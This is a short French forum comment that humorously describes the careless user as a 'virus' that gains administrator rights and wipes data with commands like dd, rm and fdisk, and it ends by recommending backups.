    Avant on le trouvait essentiellement sous windows et Mac, maintenant il y en a également sous linux.

    Ses effets peuvent être dévastateur. Il est capable en quelques secondes de tout écraser.
    Le plus souvent il ne supprime que ses données, mais le pire c'est que très souvent il arrive à passer root/Administrateur(tor).

    Sous linux il utilise les commandes dd, rm, fdisk… de façon aléatoires. Avec des résultats parfois irréparable. Sous Windows il fait parfois juste un glissé/déposé dans la corbeille.

    Des virus comme cela j'en rencontre pratiquement tous les jours. La seul solution, comme pour tout problème de sécurité : sauvegarde (attention il est parfois capable de supprimer même les sauvegardes).

Suivre le flux des commentaires

Note : les commentaires appartiennent à ceux qui les ont postés. Nous n'en sommes pas responsables.